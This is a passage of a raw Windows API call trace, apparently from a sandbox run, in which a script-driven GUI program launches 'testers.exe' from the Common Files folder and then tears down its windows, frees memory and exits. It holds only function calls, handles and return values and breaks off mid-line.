[0265.355] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0265.355] NtdllDialogWndProc_W () returned 0x0 [0265.355] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.355] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.355] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0265.355] NtdllDialogWndProc_W () returned 0x0 [0265.356] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0265.356] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0265.356] TranslateMessage (lpMsg=0x91fd04) returned 0 [0265.356] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0265.356] GetForegroundWindow () returned 0x80170 [0265.356] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.356] GetCursorPos (in: lpPoint=0x91fb40 | out: lpPoint=0x91fb40*(x=769, y=501)) returned 1 [0265.357] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91fb40 | out: lpPoint=0x91fb40) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xef3e68 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81480 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1940 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1910 [0265.357] GetAsyncKeyState (vKey=1) returned 1 [0265.357] GetAsyncKeyState (vKey=2) returned 0 [0265.357] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1920 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb048 [0265.357] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0265.357] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb048 | out: hHeap=0xc60000) returned 1 [0265.357] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1920 | out: hHeap=0xc60000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe838f8 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c7f0 [0265.357] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1920 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7380 [0265.357] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1930 [0265.357] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0265.358] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1930 | out: hHeap=0xc60000) returned 1 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1930 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7f8 [0265.358] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7f8 | out: hHeap=0xc60000) returned 1 [0265.358] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1930 | out: hHeap=0xc60000) returned 1 [0265.358] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1920 | out: hHeap=0xc60000) returned 1 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1c60 [0265.358] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb048 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83b38 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1920 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0265.358] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1920 | out: hHeap=0xc60000) returned 1 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x42) returned 0xed3858 [0265.358] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0265.358] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2a) returned 0xee0c80 [0265.358] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xee0c80 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0265.358] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x91f950*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x91f918 | out: lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x91f918*(hProcess=0x61c, hThread=0x5e8, dwProcessId=0xe0, dwThreadId=0xe4)) returned 1 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed3858 | out: hHeap=0xc60000) returned 1 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0c80 | out: hHeap=0xc60000) returned 1 [0265.364] CloseHandle (hObject=0x5e8) returned 1 [0265.364] CloseHandle (hObject=0x61c) returned 1 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83b38 | out: hHeap=0xc60000) returned 1 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb048 | out: hHeap=0xc60000) returned 1 [0265.364] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1c60 | out: hHeap=0xc60000) returned 1 [0265.364] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c7f0 | out: hHeap=0xc60000) returned 1 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe838f8 | out: hHeap=0xc60000) returned 1 [0265.364] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0265.364] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb048 [0265.364] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1920 [0265.364] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb228 [0265.364] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe838f8 [0265.364] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1930 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe838f8 | out: hHeap=0xc60000) returned 1 [0265.364] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebaeb8 [0265.364] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe838f8 [0265.364] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb048 | out: hHeap=0xc60000) returned 1 [0265.365] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1920 | out: hHeap=0xc60000) returned 1 [0265.365] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb048 [0265.365] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1920 [0265.365] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4a8 [0265.365] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83b38 [0265.365] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a80 [0265.365] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83b38 | out: hHeap=0xc60000) returned 1 [0265.365] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb3b8 [0265.365] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83b38 [0265.365] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb048 | out: hHeap=0xc60000) returned 1 [0265.365] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1920 | out: hHeap=0xc60000) returned 1 [0265.365] LockWindowUpdate (hWndLock=0x0) returned 0 [0265.365] DestroyWindow (hWnd=0x50172) returned 1 [0265.365] NtdllDefWindowProc_W () returned 0x0 [0265.365] KillTimer (hWnd=0x50172, uIDEvent=0x1) returned 1 [0265.365] Shell_NotifyIconW (dwMessage=0x2, lpData=0x91f720) returned 1 [0265.392] DestroyWindow (hWnd=0x80170) returned 1 [0265.392] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.392] NtdllDialogWndProc_W () returned 0x0 [0265.393] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.393] NtdllDialogWndProc_W () returned 0x0 [0265.399] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.399] NtdllDialogWndProc_W () returned 0x0 [0265.402] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.402] NtdllDialogWndProc_W () returned 0x1 [0265.402] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.402] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.402] NtdllDialogWndProc_W () returned 0x0 [0265.403] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.403] NtdllDialogWndProc_W () returned 0x0 [0265.403] NtdllDefWindowProc_W () returned 0x0 [0265.403] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.403] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.403] InvalidateRect (hWnd=0x80170, lpRect=0x0, bErase=1) returned 1 [0265.403] DestroyAcceleratorTable (hAccel=0x150171) returned 1 [0265.403] DeleteObject (ho=0x6c0a07cd) returned 1 [0265.403] DestroyWindow (hWnd=0x6014c) returned 1 [0265.403] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.403] NtdllDialogWndProc_W () returned 0x0 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eeb8 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0df0 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eea0 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0de0 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ec78 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0cc0 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xda0100 | out: hHeap=0xc60000) returned 1 [0265.404] DestroyWindow (hWnd=0x50166) returned 1 [0265.404] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.404] NtdllDialogWndProc_W () returned 0x0 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ef18 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0e50 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ef00 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0e40 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eee8 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0e30 | out: hHeap=0xc60000) returned 1 [0265.404] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xda01a8 | out: hHeap=0xc60000) returned 1 [0265.404] DeleteObject (ho=0x4c0a0714) returned 1 [0265.404] DestroyWindow (hWnd=0xb0164) returned 1 [0265.405] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.405] NtdllDialogWndProc_W () returned 0x0 [0265.405] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ef60 | out: hHeap=0xc60000) returned 1 [0265.405] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1ae0 | out: hHeap=0xc60000) returned 1 [0265.405] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f110 | out: hHeap=0xc60000) returned 1 [0265.405] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1af0 | out: hHeap=0xc60000) returned 1 [0265.405] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f0c8 | out: hHeap=0xc60000) returned 1 [0265.405] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1000 | out: hHeap=0xc60000) returned 1 [0265.405] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xda0250 | out: hHeap=0xc60000) returned 1 [0265.405] DeleteObject (ho=0x590a01d5) returned 1 [0265.405] DestroyWindow (hWnd=0x600a2) returned 1 [0265.405] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.405] NtdllDialogWndProc_W () returned 0x0 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83a90 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0e90 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81570 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0e70 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83928 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1b40 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xda02f8 | out: hHeap=0xc60000) returned 1 [0265.406] DeleteObject (ho=0x170a0716) returned 1 [0265.406] DestroyWindow (hWnd=0x5010a) returned 1 [0265.406] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.406] NtdllDialogWndProc_W () returned 0x0 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83a60 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1b50 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83a48 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1b00 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe812d0 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1ac0 | out: hHeap=0xc60000) returned 1 [0265.406] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xda03a0 | out: hHeap=0xc60000) returned 1 [0265.406] DeleteObject (ho=0x840a01b1) returned 1 [0265.406] DestroyWindow (hWnd=0x5015e) returned 1 [0265.406] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.406] NtdllDialogWndProc_W () returned 0x0 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83ac0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1b70 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f008 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19e0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f080 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1aa0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xda0448 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19a0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0ee0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0f20 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1ab0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0e60 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0e00 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ee88 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0dc0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ee70 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0db0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ee58 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0da0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ee40 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d90 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ee28 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d80 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ee10 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d70 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7edf8 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d60 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ede0 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d50 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7edc8 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d40 | out: hHeap=0xc60000) returned 1 [0265.408] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7edb0 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d30 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ed98 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d20 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ed80 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d10 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ed68 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0d00 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ed50 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0cf0 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ed38 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0ce0 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ed20 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0cb0 | out: hHeap=0xc60000) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcb8da0 | out: hHeap=0xc60000) returned 1 [0265.409] KillTimer (hWnd=0x0, uIDEvent=0x7fc9) returned 1 [0265.409] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0dd0 | out: hHeap=0xc60000) returned 1 [0265.409] NtdllDialogWndProc_W () returned 0x0 [0265.412] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0265.412] NtdllDialogWndProc_W () returned 0x0 [0265.412] DeleteObject (ho=0x741006ef) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe838b0 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe838e0 | out: hHeap=0xc60000) returned 1 [0265.412] DeleteObject (ho=0x5910026a) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83898 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83868 | out: hHeap=0xc60000) returned 1 [0265.412] DeleteObject (ho=0x841006f1) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ef48 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eca8 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe836d0 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe905e8 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83538 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17f0 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe90618 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1790 | out: hHeap=0xc60000) returned 1 [0265.412] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83580 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1780 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe90648 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83448 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1680 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9c540 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83688 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1800 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcbb940 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1910 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81480 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1940 | out: hHeap=0xc60000) returned 1 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef3e68 | out: hHeap=0xc60000) returned 1 [0265.413] PostQuitMessage (nExitCode=0) [0265.413] GetMessageW (in: lpMsg=0x91fdbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x91fdbc) returned 0 [0265.413] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b00 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f08 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69630 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79268 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd695e0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758b0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79298 | out: 